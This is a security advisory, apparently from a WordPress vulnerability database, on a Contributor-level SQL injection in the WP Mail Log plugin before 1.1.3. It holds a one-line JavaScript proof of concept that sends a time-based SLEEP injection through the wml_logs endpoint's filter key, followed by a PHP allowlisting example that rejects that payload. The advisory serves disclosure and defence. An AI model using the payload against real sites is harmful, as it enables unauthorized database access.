WordPress Plugin Vulnerabilities

WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.

Proof of Concept

Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the injected SQL.

await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10, filter: {1: {key: '1=(SELECT IF(1=1,SLEEP(10),\'a\')))#', operator: '', value: ''}}}});
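The injected string in the request above travels in the filter's key field. Assuming that key is meant to name a column, value binding alone cannot protect it, because identifiers and operators cannot be passed as bound parameters. The following PHP is an added example, not WP Mail Log's code or its 1.1.3 fix: it allowlists the key and operator and binds only the value. The column names, operator names and function name are assumptions made for illustration.

```php
<?php
// Added example, not WP Mail Log's code. Column/operator names are assumed.
const EXAMPLE_COLUMNS   = ['subject', 'receiver', 'status'];
const EXAMPLE_OPERATORS = ['equals' => '=', 'contains' => 'LIKE'];

// Build a WHERE fragment plus bound values from a client-supplied filter list.
// Identifiers and operators come only from the allowlists; values are bound as %s.
function example_build_where(array $filters): array
{
    $clauses = [];
    $args    = [];
    foreach ($filters as $f) {
        $f   = is_array($f) ? $f : [];
        $key = $f['key'] ?? null;
        $op  = $f['operator'] ?? null;
        $val = $f['value'] ?? null;
        if (!is_string($key) || !in_array($key, EXAMPLE_COLUMNS, true)) {
            throw new InvalidArgumentException('unknown filter key');
        }
        if (!is_string($op) || !array_key_exists($op, EXAMPLE_OPERATORS)) {
            throw new InvalidArgumentException('unknown filter operator');
        }
        if (!is_scalar($val)) {
            throw new InvalidArgumentException('filter value must be scalar');
        }
        $val = (string) $val;
        if ($op === 'contains') {
            // Escape LIKE wildcards; inside WordPress use $wpdb->esc_like().
            $val = '%' . addcslashes($val, '_%\\') . '%';
        }
        $clauses[] = "`{$key}` " . EXAMPLE_OPERATORS[$op] . ' %s';
        $args[]    = $val;
    }
    return [$clauses ? implode(' AND ', $clauses) : '1=1', $args];
}

// Constructed inputs: a legitimate filter, then the filter from the proof of concept.
$legit = [1 => ['key' => 'status', 'operator' => 'equals', 'value' => 'sent']];
$poc   = [1 => ['key' => "1=(SELECT IF(1=1,SLEEP(10),'a')))#", 'operator' => '', 'value' => '']];

[$where, $args] = example_build_where($legit);
echo $where, ' | ', json_encode($args), PHP_EOL;
// In WordPress: $wpdb->prepare("SELECT * FROM {$table} WHERE {$where} LIMIT %d", array_merge($args, [$page_size]));

try {
    example_build_where($poc);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The proof-of-concept filter is rejected at the key check, before any SQL text is assembled.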

Affects Plugins

Fixed in 1.1.3

Classification

Type: SQLI

Miscellaneous

Original Researcher: dc11
Submitter: dc11
Verified: Yes

Timeline

Publicly Published: 2023-11-28
Added: 2023-11-28
Last Updated: 2023-11-28